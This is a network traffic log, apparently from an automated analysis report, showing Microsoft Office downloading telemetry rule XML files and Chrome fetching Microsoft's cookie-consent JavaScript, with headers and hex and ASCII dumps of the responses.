                                                                                2024-10-04 09:34:06 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                83192.168.2.55548413.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:06 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:06 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:06 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 501
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                ETag: "0x8DC582BACFDAACD"
                                                                                x-ms-request-id: 0da9586c-701e-0097-318c-15b8c1000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093406Z-15767c5fc55852fxfeh7csa2dn0000000c9g0000000036nv
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:06 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                84192.168.2.55548513.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:06 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:06 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:06 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 2592
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                ETag: "0x8DC582BB5B890DB"
                                                                                x-ms-request-id: b9a19cb7-401e-0078-068c-154d34000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093406Z-15767c5fc554l9xf959gp9cb1s00000006gg000000004te4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:06 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                85192.168.2.55549113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:07 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 3342
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                ETag: "0x8DC582B927E47E9"
                                                                                x-ms-request-id: 1cc30bd5-e01e-0071-1a8c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55qdcd62bsn50hd6s0000000c3g000000006ydb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                86192.168.2.55549413.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:07 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1393
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                ETag: "0x8DC582BE3E55B6E"
                                                                                x-ms-request-id: b23951fc-501e-005b-2a8c-15d7f7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55tsfp92w7yna557w0000000cd0000000002gz8
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                87192.168.2.55549213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:07 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 2284
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                ETag: "0x8DC582BCD58BEEE"
                                                                                x-ms-request-id: 82f8c3b9-c01e-0014-418c-15a6a3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55whfstvfw43u8fp40000000cgg000000003k75
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                88192.168.2.55549513.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:07 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1356
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                ETag: "0x8DC582BDC681E17"
                                                                                x-ms-request-id: b9a19e00-401e-0078-388c-154d34000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55n4msds84xh4z67w000000064g000000000cgd
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                89192.168.2.55549613.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:07 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1393
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                ETag: "0x8DC582BE39DFC9B"
                                                                                x-ms-request-id: 7afec079-601e-000d-468c-152618000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc552g4w83buhsr3htc0000000c90000000008whx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                90192.168.2.55549713.107.246.454436020C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:07 UTC390OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                Host: wcpstatic.microsoft.com
                                                                                Connection: keep-alive
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: none
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: empty
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Cookie: MSCC=NR
                                                                                2024-10-04 09:34:07 UTC712INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: application/javascript
                                                                                Content-Length: 52717
                                                                                Connection: close
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                Age: 8913
                                                                                Cache-Control: max-age=43200
                                                                                Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                Etag: 0x8DA85F6F74C6D08
                                                                                Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                Vary: Accept-Encoding
                                                                                X-Cache: CONFIG_NOCACHE
                                                                                x-ms-blob-type: BlockBlob
                                                                                x-ms-lease-status: unlocked
                                                                                x-ms-request-id: c6f3427e-201e-0014-712b-1668f5000000
                                                                                x-ms-version: 2009-09-19
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55v7j95gq2uzq37a00000000cpg000000000p30
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC15672INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                2024-10-04 09:34:07 UTC712INData Raw: 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69 65
                                                                                Data Ascii: {return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cookie
                                                                                2024-10-04 09:34:07 UTC16384INData Raw: 2d 6c 61 62 65 6c 3d 22 27 2b 69 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 29 2b 27 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 63 6c 6f 73 65 4d 6f 64 61 6c 49 63 6f 6e 2b 27 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 26 23 78 32 37 31 35 3b 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64 61 6c 42 6f 64 79 2b 27 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64
                                                                                Data Ascii: -label="'+i.escapeHtml(this.textResources.preferencesDialogCloseLabel)+'" class="'+a.closeModalIcon+'" tabindex="0">&#x2715;</button>\n <div role="document" class="'+a.modalBody+'">\n <div>\n <h1 class="'+a.mod
                                                                                2024-10-04 09:34:07 UTC16384INData Raw: 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d
                                                                                Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button-
